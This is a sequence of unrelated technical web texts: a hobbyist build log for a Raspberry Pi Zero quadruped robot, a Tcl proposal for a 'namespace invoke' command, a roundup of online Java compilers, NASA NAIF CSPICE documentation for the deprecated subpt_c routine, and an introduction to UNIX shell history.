02/07/2016 at 20:25 • 0 comments

I also needed to figure out a way to attach the camera to the robot in a robust way. So I drilled some holes in the plastic that holds it, and screwed that to the Pi Zero:

This is with just the camera connected to the USB. But for development it's nice to have both the camera and WiFi, so I repurposed that two-port hub I had, and made an alternate cable:

Of course googly eyes are very important too!

Camera
02/07/2016 at 13:40 • 0 comments

Today I worked a little bit on adding a camera to Tote Zero. Most of this I have already done for the #Pico-Kubik quadruped robot, but I thought I would do a more detailed write-up.

I started by digging up from my junk pile an old camera module from a laptop. You can usually find those in electronic junk or, failing that, buy them as spare parts for a dollar or two. Mine looked something like this:

Next I opened it and extracted the actual sensor:

The cable has a plug, for convenience. I took my ohm-meter and checked which cables are connected to the ground. In this case it was the green one and, of course, the shielding -- the first two pins. The rest is easy: orange and red are D+ and D-, and black is VCC. In this cable, black and brown cables are connected to the same pin. Once I knew which cable was which, I used a piece of 1.27mm pin header to connect that to a normal USB cable:

Then I needed a way to test it. I didn't feel like risking frying my laptop, so instead I took a Raspberry Pi and some cheap USB hub, and used that:

The camera enumerated nicely.
Here's an excerpt from dmesg:

    [ 3875.068666] usb 1-1.4: new high-speed USB device number 45 using dwc_otg
    [ 3875.176718] usb 1-1.4: New USB device found, idVendor=174f, idProduct=5a31
    [ 3875.176759] usb 1-1.4: New USB device strings: Mfr=2, Product=1, SerialNumber=3
    [ 3875.176779] usb 1-1.4: Product: USB 2.0 Camera
    [ 3875.176798] usb 1-1.4: Manufacturer: Sonix Technology Co., Ltd.
    [ 3875.176815] usb 1-1.4: SerialNumber: SN0001
    [ 3875.190376] uvcvideo: Found UVC 1.00 device USB 2.0 Camera (174f:5a31)
    [ 3875.205832] input: USB 2.0 Camera as /devices/platform/soc/20980000.usb/usb1/1-1/1-1.4/1-1.4:1.0/input/input17

And here is lsusb:

    Bus 001 Device 045: ID 174f:5a31 Syntek Sonix USB 2.0 Camera
    Bus 001 Device 003: ID 148f:7601 Ralink Technology, Corp.
    Bus 001 Device 002: ID 1a40:0101 Terminus Technology Inc. 4-Port HUB
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

Then I installed motion and tried the camera with it. I had to modify the configuration to make the stream available outside of localhost. Otherwise, it just worked:

Unfortunately, motion has quite a bit of lag, and if I wanted to use the streaming for controlling the robot remotely, that would be unacceptable. So I decided to try mjpegstreamer. There is a simple tutorial on installing mjpegstreamer on the Raspberry Pi. Of course instead of using files as input, I used the input_uvc.so plugin:

    ./mjpg_streamer -i 'plugins/input_uvc/input_uvc.so -r 160x100 -fps 20 -y -q 40' -o 'plugins/output_http/output_http.so -w www'

With such a low resolution and quality, the streaming is quite fluent!

I noticed that the camera module is getting quite warm while working. @Arsenijs suggested that those laptop modules, while pretty much normal USB devices, expect a lower voltage than the usual 5V. I will have to try and power it from the Pi's 3.3V power and see how it works then. I also made a plug for the Pi Zero, to save some space:

That should work, but then I can't have the WiFi dongle.
I guess I will need to look into making Tote Zero compatible with the #RPi WiFi pants (or even add the ESP8266 to Tote's PCB).

Update: I made a smaller cable for the Pi Zero:

While that makes it impossible to use the WiFi dongle, I can still use OpenCV with this camera to make the robot analyze what it sees and actually do something fun.

First Walk
01/27/2016 at 14:00 • 0 comments

So today I figured out which servo is on which leg, rebuilt the legs to make the coxas longer, trimmed all the servos again, added pieces of rubber tube as feet, and replaced the battery with a larger one. I also adjusted the voltage to be exactly 5V (it was 5.2V for some reason); hopefully that will make this thing heat up less. Finally, I made some small fixes and adjustments to the code, and lo and behold, we have a walking robot! It's still not perfect, of course, but at last it works.

One Step Forward, Two Steps Back
01/26/2016 at 22:55 • 0 comments

Today I finally adapted all the code for IK and walking, and realized that practically everything I did yesterday is wrong. First, the cheap WiFi dongle that I soldered to the mini-hub is really bad. It gets hot and eats enough current to make the Pi Zero restart when the servos move. I had to switch to console over serial. Second, before you laboriously trim all the servos to the right positions, make sure the new servo library that you wrote takes the same range of angles as the old one. In this case, the old one took -90° to 90°, and the new one takes 0° to 180°. The result is that all the servos are wrong by 90° and I have to redo the trimming. Of course the board has a tendency to restart when all the servos are switched on simultaneously anyway, so I had to add some code that switches them on one by one, with some delays. Nothing new here, old #Tote had the same thing, and it's a good idea anyways.
I still have to figure out which pins are for servos on which legs -- I didn't keep track of that when connecting them, and I figured it would be easier to just go one by one in software and see which leg moves. Hopefully I can get the first walk by the end of the month.

Single-port USB Hub
01/25/2016 at 21:36 • 1 comment

In order to make working on the robot a little bit easier, I added a small USB hub that I had lying around, with a cheap WiFi card soldered to it. This way I have access to the board and still can use a single USB port for, say, a webcam. Otherwise the progress has been slow. I adjusted and trimmed the servos, so that the robot can stand in the "zero" position, but I still haven't tested the inverse kinematics or walking code.

Fixed Board
01/07/2016 at 21:49 • 0 comments

After some cosmetic touches, I'm finally happy enough with the first version of the PCB for this robot. It looks something like this:

The Fritzing file is in the repository, and the Gerber is available for download. I used a new approach for the servo sockets -- since the Pi Zero is going to be plugged in as a second layer, we don't really have enough space for the usual servo sockets. So I used one long header with angled pins -- the servos plug in two rows into that, fitting between the Pi and the board. Other than that, the board has the serial and I²C pins broken out, and also a header for all the pins that are not used for controlling servos. There is also a jumper in there, for disconnecting the servo power from the Pi -- so that we can power the two from two different sources if we need to. The usual holes, as in Tote, are for attaching the servo horns for the legs.

Servo Blaster
01/07/2016 at 20:47 • 0 comments

So I have the robot assembled pretty much the way I wanted -- the PCB as the body, an XM1584-based voltage regulator for steady 5V to the Pi and to the servos, a capacitor, a power switch, and a 2S LiPo battery. Nothing fancy, really.
I have no voltage monitoring this time, because the Pi doesn't have an ADC that I could use (I might add one in future versions), so I have to be careful about the battery use. I also have Servo Blaster, the daemon I'm using to generate the PWM signal for the servos, all installed and configured, and I have a simple Python class to use it:

    import math

    class Servo(object):
        def __init__(self, servos, index, reverse=False, trim=0):
            self.servos = servos
            self.index = index
            self.reverse = reverse
            self.trim = trim

        def move(self, radians=None, degrees=None):
            self.servos.move(self.index, radians, degrees, self.reverse, self.trim)

    class Servos(object):
        min_pos = 600
        max_pos = 2400
        unit = 4  # us
        max_servos = 12
        pos_range = 180

        def __init__(self):
            self.device = open('/dev/servoblaster', 'w')

        def __getitem__(self, index):
            return Servo(self, index)

        def move(self, servo, radians=None, degrees=None, reverse=False, trim=0):
            if degrees is None:
                degrees = math.degrees(radians)
            degrees += trim
            if reverse:
                degrees = self.pos_range - degrees
            # map 0..pos_range degrees onto the min_pos..max_pos pulse range
            position = self.min_pos + (degrees * (self.max_pos - self.min_pos) / self.pos_range)
            position = min(self.max_pos, max(self.min_pos, position))
            output = position / self.unit
            self.device.write("{}={}\n".format(servo, output))

        def update(self):
            pass

Now it's time for my favorite pastime (not): figuring out the order, orientation and trims for all the servos. Once I have that, I expect my code for the PyBoard to basically work -- which means that I should have the basic creep gait. For now, I can move each of the servos individually, while the robot lies on its back, with a wifi dongle connected for control:

Off By One Servo Plug
01/05/2016 at 16:59 • 0 comments

Mistakes in PCB design happen, and usually hurt when you receive your fabricated PCB. I was in a hurry to send the Tote Zero's PCB to fabrication before Christmas, so that I could receive it when I came back from the holidays. And as you can guess, I made a mistake.
Instead of making the servo headers GVSGVSGVSGVS... (that's ground-voltage-signal), I made them VSGVSGVSGVSG...

What now? Of course, I will eventually order another PCB (especially since this one doesn't have all the extra pins of the Pi Zero broken out, and they may come in handy later for sensors or extra servos), but for now I would like to be able to test other aspects of my robot, so that the next design includes any fixes and ideas I come up with. So I really want to use this board as it is. I could "fix" this by disassembling the plugs of the servos, and changing the order of the wires in them. In fact, it's not a lot of work, even for a dozen servos. But from my experience, sooner or later I will forget about this, and either connect an un-modified servo, or use those modified servos for something else and release the magic blue smoke. I'd prefer to avoid this. So instead I plugged the servos offset by one pin, and glued additional pins in front for the one plug that sticks out and misses its ground pins (the additional pins are red):

It's not pretty, but it will do for now. I also fixed my PCB design files already, so that I don't forget about it.
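Coming back to the Servo Blaster log: the degrees-to-microseconds conversion that Servos.move performs can be factored out into a standalone helper, which makes the trim/reverse/clamping bookkeeping easy to check in isolation. This is a sketch of mine; the function name and keyword defaults are hypothetical, mirroring the class constants:

```python
def angle_to_pulse(degrees, trim=0, reverse=False,
                   min_pos=600, max_pos=2400, pos_range=180):
    """Map a servo angle in degrees to a pulse width in microseconds."""
    degrees += trim
    if reverse:
        degrees = pos_range - degrees
    # linear map: 0 deg -> min_pos us, pos_range deg -> max_pos us
    pulse = min_pos + degrees * (max_pos - min_pos) / pos_range
    # clamp to the range the servo can actually accept
    return min(max_pos, max(min_pos, pulse))

print(angle_to_pulse(0))     # 600.0
print(angle_to_pulse(90))    # 1500.0
print(angle_to_pulse(180))   # 2400.0
```

Once each leg's trim is known, the same helper answers the "which pulse centers this servo" question from the trimming sessions in the earlier logs, without touching /dev/servoblaster at all.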
Author: Miguel Sofer <[email protected]>
State: Draft
Type: Project
Vote: Pending
Created: 01-Oct-2006
Post-History:
Tcl-Version: 8.7
Tcl-Branch: tip-284

Abstract

This TIP exposes a Tcl script-level interface to the direct command invocation engine already present in the Tcl library for years.

Proposed New Commands

This TIP proposes a new subcommand to namespace, invoke, with the following syntax:

    namespace invoke namespace cmd ?arg ...?

This invokes the command called cmd in the caller's scope, as resolved from namespace namespace, with the supplied arguments. If namespace does not exist, the command returns an error.

This TIP also proposes a new command:

    invoke level cmd ?arg ...?

This invokes the command cmd in level level with the supplied arguments. The syntax of level is the same as that required by uplevel.

Rationale

There is currently no script-level equivalent to Tcl_EvalObjv(), though the functionality is provided by one of:

    eval [list cmd ?arg ...?]
    {*}[list cmd ?arg ...?]

Note that the core tries to optimise the first case, but has to be careful to only avoid reparsing when it is guaranteed safe to do so. The notation is rather clumsy too.

The proposed new commands try to improve this situation, with the added functionality of determining the namespace in which the command name is to be resolved (functionality which was very difficult to use previously with the script-level API). In this manner it is possible for the invocation to make good use of the namespace path and namespace unknown features.

The new command invoke could be implemented as:

    proc invoke {level args} {
        if {[llength $args] == 0} {
            return -code error SomeMessage
        }
        if {[string is integer $level] && ($level >= 0)} {
            incr level
        }
        uplevel $level $args
    }

Reference Implementation and Documentation

RFE 1577324 (which depends on Patch 1577278) provides an implementation of namespace invoke.
# Differences to Other Commands

Both these commands perform command invocation, as opposed to the script evaluation done by eval, uplevel, namespace eval and namespace inscope.

namespace inscope does a magic expansion of the first argument; namespace invoke takes the first argument as a command name. In other words, namespace inscope can be used with a command prefix. Feedback on the semantics suggests that this is a worthy feature, very useful for packing up command prefixes. This TIP may yet be revised or withdrawn to take that into consideration.

Both namespace eval and namespace inscope add a call frame; namespace invoke does not - it invokes in the caller's frame.

# Sample Usage

In tcllib's ::math::calculus::romberg we see (edited for brevity):

    # Replace f with a context-independent version
    set fqname [uplevel 1 [list namespace which [lindex $f 0]]]
    set f [lreplace $f 0 0 $fqname]
    ...
    set cmd $f
    lappend cmd [expr {0.5 * ($a + $b)}]
    set v [eval $cmd]

where the command name in the prefix f is replaced with its fully qualified name. A further variable is lappended, and the result is sent to eval.

With namespace invoke and invoke this would be coded as:

    set ns [invoke 1 namespace current]
    set f [list namespace invoke $ns {*}$f]
    ...
    set v [{*}$f [expr {0.5 * ($a + $b)}]]

If both new commands took the cmd argument as a prefix to be expanded (as suggested by some early commenters), it would be even nicer for this usage:

    set ns [invoke 1 [list namespace current]]
    set f [list namespace invoke $ns $f]
    ...
    set v [invoke 0 $f [expr {0.5 * ($a + $b)}]]

The same thing (with slightly different semantics and a performance cost due to script evaluation instead of command invocation) could be obtained today by doing:

    set f [uplevel 1 [list namespace code [list uplevel 1 $f]]]
    ...
    set v [eval [lappend f [expr {0.5 * ($a + $b)}]]]

In order to fully reproduce the semantics and performance it would have to be:

    set f [uplevel 1 [list namespace code [list uplevel 1 $f]]]
    ...
    lset f end end [linsert [lindex $f end end] end [expr {0.5 * ($a + $b)}]]
    set v [eval $f]

# Copyright

This document has been placed in the public domain.
https://core.tcl-lang.org/tips/doc/trunk/tip/284.md
Learning Java coding is, of course, thrilling. And after hands-on experience writing a few sample snippets, you're all set to showcase your creativity! You have downloaded popular IDEs and tools to help you compile and validate your Java code. You're coding, going back and forth to make things work, and everything works perfectly fine for you. But then the compiler you're using just crashes. It's irritating, isn't it? Well, we cannot do anything about that. You must be wondering whether there is another way to get your work done without having to search for, download, and fiddle with a new Java compiler.

Today, there are many online Java compilers available to help you get rid of conventional, old-fashioned compilers. Since there are numerous online Java compilers available, it is hard to find which one will work best for you. A few are quite simple and offer basic features, while others offer advanced features. So, which one to go for? To help you out, we have compiled a list of must-have online Java compilers to help you compile and develop error-free code. Let's take a quick look at each of them.

CompileJava

If you want something very simple to compile the code, then this is the right online compiler for you. Compilejava.net not only helps you compile the code but also helps you execute it, and even lets you edit the Java code online on the go. All you have to do is copy and paste your Java code into the online console and you are done! It will compile the code for you. You can see the test results online within a moment.

One of the major benefits of this online tool is that you don't have to mention any filename while compiling the code. It will parse the code, locate a public class, and name it accordingly for the compiler. Moreover, you can also declare multiple public classes in a single editor. This online compiler has been available for the past five years.
One of the best things about this online compiler is that you don't have to pay anything to use it; it is totally FREE! And everyone loves free stuff.

Ideone

Talking about the most comprehensive and practical online compilers, Ideone.com can be the best choice for you. It is one of the rare online compilers that lets you run more than 60 programming languages on the go. Source code download, viewing public code, and syntax highlighting are the key features that grab the attention of many developers.

One of the most interesting features of this online compiler is that it provides an API for compilation as a service. This means you can build your own IDE, which you can use on your website. The only concern could be its limited support for Java 9. It has not yet been updated to let you compile or debug code written in Java 9.

Codiva

Even though it is quite a newbie in the world of online compilers, Codiva has managed to grab attention from many developers around the world. And the reason behind this is its compelling features. The USP of Codiva is that it starts compiling the very next moment you type the code in the compiler box, parses the compilation errors, and displays the output in the editor before you even finish the code! Isn't it cool?

Another interesting feature is its ability to auto-complete the code you are entering in the editor. Aside from these two cool features, it also brings ample support for multiple files and packages. If you want, you can also define your own custom file names. Moreover, you can also benefit from various learning programs run on Codiva. Also, it is the only online compiler available that is mobile-friendly. This means you can use it anytime and anywhere using your smartphone too.

JDoodle

It is one of the early online compilers available for developers. Initially launched with the intention of targeting the Java language, JDoodle today supports more than 70 different programming languages.
Like CompileJava.net, it doesn't require any filename specification; it handles that while parsing the file contents internally. One feature that makes it different from the rest of the online Java compilers is its amazing terminal support for running various interactive programs. You can switch between interactive and non-interactive modes based on the project requirements.

Browxy

If you have ever searched for online Java compilers, you will know that Browxy.com stands as one of the most popular online compilers and excellent Java editors to date. The reason behind this is its user-friendly interface, which makes compiling Java code quite easy and a fun activity for stressed developers. All you have to do is create your account with Browxy.com and you're done! You can compile the code anytime you want by logging into the website. It also serves as a code repository for newbie developers by allowing you to store your Java code snippets and make them available for the rest of the registered users to learn from.

Rextester

Started with the concept of testing regular expressions, Rextester has grown immensely into an online code compiler and editor today. It is used to compile code written in Java, C, C++, and 27 other programming languages. One of its interesting features is that it gives you an option to select between multiple editors based on your preference. When it comes to sharing, Rextester brings the amazing feature of letting users share a URL so that multiple users can tweak the code simultaneously, and that too without any hiccups. But the only limitation of this amazing online tool is that it only supports a single file, which is usually named rextester. Also, the class defined should not be made public.

Final Verdict

So, that's all about the popular online Java compilers available over the internet. Instead of relying on conventional desktop tools to compile your Java code, you can simply use any of these popular online editors.
And that too without any hurdles of installation, troubleshooting, or licensing. Do you know any other online Java compilers? Share your thoughts in the comments below.
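Since most of the editors above locate the public class automatically, a minimal self-contained class like the following is enough to smoke-test any of them. (This is a hypothetical scratch example, not code from the article; the class name ScratchPad is arbitrary.)

```java
// Hypothetical scratch class for trying out an online Java compiler.
// Editors like compilejava.net detect the public class, so no filename
// needs to be supplied.
public class ScratchPad {

    // A tiny computation so the run produces checkable output.
    static int square(int n) {
        return n * n;
    }

    public static void main(String[] args) {
        System.out.println("square(7) = " + square(7));
    }
}
```

Paste it in, run it, and you should see `square(7) = 49` in the output pane.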
https://opensourceforu.com/2018/09/top-5-java-compilers-every-developer-should-use-in-2018/
void subpt_c ( ConstSpiceChar   * method,
               ConstSpiceChar   * target,
               SpiceDouble        et,
               ConstSpiceChar   * abcorr,
               ConstSpiceChar   * obsrvr,
               SpiceDouble        spoint [3],
               SpiceDouble      * alt        )

Deprecated: This routine has been superseded by the CSPICE routine subpnt_c. This routine is supported for purposes of backward compatibility only.

Compute the rectangular coordinates of the sub-observer point on a target body at a particular epoch, optionally corrected for planetary (light time) and stellar aberration. Return these coordinates expressed in the body-fixed frame associated with the target body. Also, return the observer's altitude above the target body.

FRAMES
PCK
SPK
TIME
GEOMETRY

   Variable  I/O  Description
   --------  ---  --------------------------------------------------
   method     I   Computation method.
   target     I   Name of target body.
   et         I   Epoch in ephemeris seconds past J2000 TDB.
   abcorr     I   Aberration correction.
   obsrvr     I   Name of observing body.
   spoint     O   Sub-observer point on the target body.
   alt        O   Altitude of the observer above the target body.

method is a short string specifying the computation method to be used. The choices are:

   "Near point"   The sub-observer point is defined as the nearest point on the target relative to the observer.

   "Intercept"    The sub-observer point is defined as the target surface intercept of the line containing the observer and the target's center.

Neither case nor white space are significant in `method'; for example, the string " nearPOINT" is valid.

This routine assumes that the target body is modeled by a tri-axial ellipsoid, and that a PCK file containing its radii has been loaded into the kernel pool via furnsh_c.

et is the epoch in ephemeris seconds past J2000 at which the sub-observer point on the target body is to be computed.

abcorr indicates the aberration corrections to be applied when computing the observer-target state. `abcorr' may be any of the following.

   "NONE"    Apply no correction. Return the geometric sub-observer point on the target body.

   "LT"      Correct for planetary (light time) aberration.
Both the state and rotation of the target body are corrected for light time.

   "LT+S"    Correct for planetary (light time) and stellar aberrations. Both the state and rotation of the target body are corrected for light time.

   "CN"      Converged Newtonian light time correction. In solving the light time equation, the "CN" correction iterates until the solution converges. See the header of spkezr_c for a discussion of precision of light time corrections. Both the state and rotation of the target body are corrected for light time.

   "CN+S"    Converged Newtonian light time correction and stellar aberration correction. Both the state and rotation of the target body are corrected for light time.

spoint is the sub-observer point on the target body at `et' expressed relative to the body-fixed frame of the target body.

The sub-observer point is defined either as the point on the target body that is closest to the observer, or the target surface intercept of the line from the observer to the target's center; the input argument `method' selects the definition to be used.

The body-fixed frame, which is time-dependent, is evaluated at `et' if `abcorr' is "NONE"; otherwise the frame is evaluated at et-lt, where `lt' is the one-way light time from target to observer.

The state of the target body is corrected for aberration as specified by `abcorr'; the corrected state is used in the geometric computation. As indicated above, the rotation of the target is retarded by one-way light time if `abcorr' specifies that light time correction is to be done.

alt is the "altitude" of the observer above the target body. When `method' specifies a "near point" computation, `alt' is truly altitude in the standard geometric sense: the length of a segment dropped from the observer to the target's surface, such that the segment is perpendicular to the surface at the contact point `spoint'. When `method' specifies an "intercept" computation, `alt' is still the length of the segment from the observer to the surface point `spoint', but this segment in general is not perpendicular to the surface.

None.
If any of the listed errors occur, the output arguments are left unchanged.

1) If the input argument `method' is not recognized, the error SPICE(DUBIOUSMETHOD) is signaled.

2) If either of the input body names `target' or `obsrvr' cannot be mapped to NAIF integer codes, the error SPICE(IDCODENOTFOUND) is signaled.

3) If `obsrvr' and `target' map to the same NAIF integer ID codes, the error SPICE(BODIESNOTDISTINCT) is signaled.

4) If frame definition data enabling the evaluation of the state of the target relative to the observer in target body-fixed coordinates have not been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine.

5) If the specified aberration correction is not recognized, the error will be diagnosed and signaled by a routine in the call tree of this routine.

6) If insufficient ephemeris data have been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine.

7) If the triaxial radii of the target body have not been loaded into the kernel pool prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine.

8) The target must be an extended body: if any of the radii of the target body are non-positive, the error will be diagnosed and signaled by routines in the call tree of this routine.

9) If PCK data supplying a rotation model for the target body have not been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine.

Appropriate SPK, PCK, and frame data must be available to the calling program before this routine is called. Typically the data are made available by loading kernels; however the data may be supplied via subroutine interfaces if applicable.
Either type of file may be loaded via furnsh_c.

- Frame data: if a frame definition is required to convert the observer and target states to the body-fixed frame of the target, that definition must be available in the kernel pool. Typically the definition is supplied by loading a frame kernel via furnsh_c.

In all cases, kernel data are normally loaded once per program run, NOT every time this routine is called.

subpt_c computes the sub-observer point on a target body. (The sub-observer point is commonly called the sub-spacecraft point when the observer is a spacecraft.) subpt_c also determines the altitude of the observer above the target body.

There are two different popular ways to define the sub-observer point: "nearest point on target to observer" or "target surface intercept of line containing observer and target." These coincide when the target is spherical and generally are distinct otherwise. When comparing sub-observer point computations with results from sources other than SPICE, it's essential to ensure the same geometric definitions are used.

In the following example program, the file spk_m_031103-040201_030502.bsp is a binary SPK file containing data for Mars Global Surveyor, Mars, and the Sun for a time interval bracketing the date 2004 JAN 1 12:00:00 UTC. pck00007.tpc is a planetary constants kernel file containing radii and rotation model constants. naif0007.tls is a leapseconds kernel.

Find the sub-observer point of the Mars Global Surveyor (MGS) spacecraft on Mars for a specified time. Perform the computation twice, using both the "intercept" and "near point" options.

   #include <stdio.h>
   #include "SpiceUsr.h"

   int main ()
   {
      #define METHODLEN 25

      SpiceChar     method [2][METHODLEN] = { "Intercept", "Near point" };

      SpiceDouble   alt;
      SpiceDouble   et;
      SpiceDouble   lat;
      SpiceDouble   lon;
      SpiceDouble   radius;
      SpiceDouble   spoint [3];

      SpiceInt      i;

      /.
      Load kernel files.
      ./
      furnsh_c ( "naif0007.tls"                   );
      furnsh_c ( "pck00007.tpc"                   );
      furnsh_c ( "spk_m_031103-040201_030502.bsp" );

      /.
      Convert the UTC request time to ET (seconds past J2000 TDB).
      ./
      str2et_c ( "2004 JAN 1 12:00:00", &et );

      /.
      Compute sub-spacecraft point using light time and stellar
      aberration corrections. Use the "target surface intercept"
      definition of sub-spacecraft point on the first loop
      iteration, and use the "near point" definition on the second.
      ./
      for ( i = 0;  i < 2;  i++ )
      {
         subpt_c ( method[i], "MARS", et, "LT+S", "MGS", spoint, &alt );

         /.
         Convert rectangular coordinates to planetocentric latitude
         and longitude. Convert radians to degrees.
         ./
         reclat_c ( spoint, &radius, &lon, &lat );

         lon *= dpr_c ();
         lat *= dpr_c ();

         /.
         Write the results.
         ./
         printf ( "\n"
                  "Computation method: %s\n"
                  "\n"
                  " Radius (km)                   = %25.15e\n"
                  " Planetocentric Latitude (deg) = %25.15e\n"
                  " Planetocentric Longitude (deg)= %25.15e\n"
                  " Altitude (km)                 = %25.15e\n"
                  "\n",
                  method[i], radius, lat, lon, alt                );
      }

      return ( 0 );
   }

When this program is executed, the output will be:

   Computation method: Intercept

    Radius (km)                   = 3.387970765126046e+03
    Planetocentric Latitude (deg) = -3.970227239033073e+01
    Planetocentric Longitude (deg)= -1.592266633611679e+02
    Altitude (km)                 = 3.731735060549094e+02

   Computation method: Near point

    Radius (km)                   = 3.387984503271711e+03
    Planetocentric Latitude (deg) = -3.966593293571449e+01
    Planetocentric Longitude (deg)= -1.592266633611679e+02
    Altitude (km)                 = 3.731666361282019e+02

C.H. Acton (JPL)
N.J. Bachman (JPL)
J.E. McLean (JPL)

-CSPICE Version 1.0.5, 10-JUL-2014 (NJB)

   Discussion of light time corrections was updated. Assertions that converged light time corrections are unlikely to be useful were removed.

-CSPICE Version 1.0.4, 19-MAY-2010 (BVS)

   Index line now states that this routine is deprecated.

-CSPICE Version 1.0.3, 07-FEB-2008 (NJB)

   Abstract now states that this routine is deprecated.

-CSPICE Version 1.0.2, 22-JUL-2004 (NJB)

   Updated header to indicate that the `target' and `observer' input arguments can now contain string representations of integers.

-CSPICE Version 1.0.1, 27-JUL-2003 (NJB) (CHA)

   Various header corrections were made.
   The example program was upgraded to use real kernels, and the program's output is shown.

-CSPICE Version 1.0.0, 31-MAY-1999 (NJB) (JEM)

DEPRECATED

sub-observer point

Wed Apr 5 17:54:45 2017
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpt_c.html
The shell is a special program used as an interface between the user and the heart of the UNIX operating system, a program called the kernel, as shown in Figure 1.1. The kernel is loaded into memory at boot-up time and manages the system until shutdown. It creates and controls processes, and manages memory, file systems, communications, and so forth. All other programs, including shell programs, reside out on the disk. The kernel loads those programs into memory, executes them, and cleans up the system when they terminate. The shell is a utility program that starts up when you log on. It allows users to interact with the kernel by interpreting commands that are typed either at the command line or in a script file. When you log on, an interactive shell starts up and prompts you for input. After you type a command, it is the responsibility of the shell to (a) parse the command line; (b) handle wildcards, redirection, pipes, and job control; and (c) search for the command, and if found, execute that command. When you first learn UNIX, you spend most of your time executing commands from the prompt. You use the shell interactively. If you type the same set of commands on a regular basis, you may want to automate those tasks. This can be done by putting the commands in a file, called a script file, and then executing the file. A shell script is much like a batch file: It is a list of UNIX commands typed into a file, and then the file is executed. More sophisticated scripts contain programming constructs for making decisions, looping, file testing, and so forth. Writing scripts not only requires learning programming constructs and techniques, but assumes that you have a good understanding of UNIX utilities and how they work. There are some utilities, such as grep, sed, and awk, that are extremely powerful tools used in scripts for the manipulation of command output and files. 
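The constructs just mentioned can be seen together in a few lines. This is a hypothetical sketch (not an example from the text), assuming bash: a loop, a decision, and the grep and awk utilities working on command output.

```shell
#!/bin/bash
# Hypothetical example: a loop, a decision, and grep/awk -- the
# building blocks of a shell script as described in the text.
fruits="apple banana cherry"
for f in $fruits; do
    if echo "$f" | grep -q an; then   # decision: does $f contain "an"?
        echo "$f contains 'an'"
    fi
done
echo "$fruits" | awk '{print NF, "words"}'   # awk counts the words
```

Saved to a file and run with bash, this prints "banana contains 'an'" followed by "3 words".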
After you have become familiar with these tools and the programming constructs for your particular shell, you will be ready to start writing useful scripts. When executing commands from within a script, you are using the shell as a programming language. The three prominent and supported shells on most UNIX systems are the Bourne shell (AT&T shell), the C shell (Berkeley shell), and the Korn shell (superset of the Bourne shell). All three of these behave pretty much the same way when running interactively, but have some differences in syntax and efficiency when used as scripting languages. The Bourne shell is the standard UNIX shell, and is used to administer the system. Most of the system administration scripts, such as the rc start and stop scripts and shutdown are Bourne shell scripts, and when in single user mode, this is the shell commonly used by the administrator when running as root. This shell was written at AT&T and is known for being concise, compact, and fast. The default Bourne shell prompt is the dollar sign ($). The C shell was developed at Berkeley and added a number of features, such as command line history, aliasing, built-in arithmetic, filename completion, and job control. The C shell has been favored over the Bourne shell by users running the shell interactively, but administrators prefer the Bourne shell for scripting, because Bourne shell scripts are simpler and faster than the same scripts written in C shell. The default C shell prompt is the percent sign (%). The Korn shell is a superset of the Bourne shell written by David Korn at AT&T. A number of features were added to this shell above and beyond the enhancements of the C shell. Korn shell features include an editable history, aliases, functions, regular expression wildcards, built-in arithmetic, job control, coprocessing, and special debugging features. The Bourne shell is almost completely upward-compatible with the Korn shell, so older Bourne shell programs will run fine in this shell. 
The default Korn shell prompt is the dollar sign ($). Although often called "Linux" shells, Bash and TC shells are freely available and can be compiled on any UNIX system; in fact, the shells are now bundled with Solaris 8, Sun's UNIX operating system. But when you install Linux, you will have access to the GNU shells and tools, and not the standard UNIX shells and tools. Although Linux supports a number of shells, the Bourne Again shell (bash) and the TC shell (tcsh) are by far the most popular. The Z shell is another Linux shell that incorporates a number of features from the Bourne Again shell, the TC shell, and the Korn shell. The Public Domain Korn shell (pdksh), a Korn shell clone, is also available, and for a fee you can get AT&T's Korn shell, not to mention a host of other, lesser-known shells. To see what shells are available under your version of Linux, look in the file /etc/shells. To change to one of the shells listed in /etc/shells, type the chsh command and the name of the shell. For example, to change permanently to the TC shell, use the chsh command. At the prompt, type:

chsh /bin/tcsh

The first significant, standard UNIX shell was introduced in V7 (seventh edition of AT&T) UNIX in late 1979, and was named after its creator, Stephen Bourne. The Bourne shell as a programming language is based on a language called Algol, and was primarily used to automate system administration tasks. Although popular for its simplicity and speed, it lacks many of the features for interactive use, such as history, aliasing, and job control. Enter bash, the Bourne Again shell, which was developed by Brian Fox of the Free Software Foundation under the GNU copyright license and is the default shell for the very popular Linux operating system. It was intended to conform to the IEEE POSIX P1003.2/ISO 9945.2 Shell and Tools standard.
Bash also offers a number of new features (both at the interactive and programming level) missing in the original Bourne shell (yet Bourne shell scripts will still run unmodified). It also incorporates the most useful features of both the C shell and Korn shell. It's big. The improvements over Bourne shell are: command line history and editing, directory stacks, job control, functions, aliases, arrays, integer arithmetic (in any base from 2 to 64), and Korn shell features, such as extended metacharacters, select loops for creating menus, the let command, etc. The C shell, developed at the University of California at Berkeley in the late 1970s, was released as part of 2BSD UNIX. The shell, written primarily by Bill Joy, offered a number of additional features not provided in the standard Bourne shell. The C shell is based on the C programming language, and when used as a programming language, it shares a similar syntax. It also offers enhancements for interactive use, such as command line history, aliases, and job control. Because the shell was designed on a large machine and a number of additional features were added, the C shell has a tendency to be slow on small machines and sluggish even on large machines when compared to the Bourne shell. The TC shell is an expanded version of the C shell. Some of the new features are: command line editing (emacs and vi), scrolling the history list, advanced filename, variable, and command completion, spelling correction, scheduling jobs, automatic locking and logout, time stamps in the history list, etc. It's also big. With both the Bourne shell and the C shell available, the UNIX user now had a choice, and conflicts arose over which was the better shell. David Korn, from AT&T, invented the Korn shell in the mid-1980s. It was released in 1986 and officially became part of the SVR4 distribution of UNIX in 1988. The Korn shell, really a superset of the Bourne shell, runs not only on UNIX systems, but also on OS/2, VMS, and DOS. 
It provides upward-compatibility with the Bourne shell, adds many of the popular features of the C shell, and is fast and efficient. The Korn shell has gone through a number of revisions. The most widely used version of the Korn shell is the 1988 version, although the 1993 version is gaining popularity. Linux users may find they are running the free version of the Korn shell, called the Public Domain Korn shell, or simply pdksh, a clone of David Korn's 1988 shell. It is free and portable, and work is currently underway to make it fully compatible with its namesake, the Korn shell, and to make it POSIX compliant. Also available is the Z shell (zsh), another Korn shell clone with TC shell features, written by Paul Falstad and freely available at a number of Web sites.

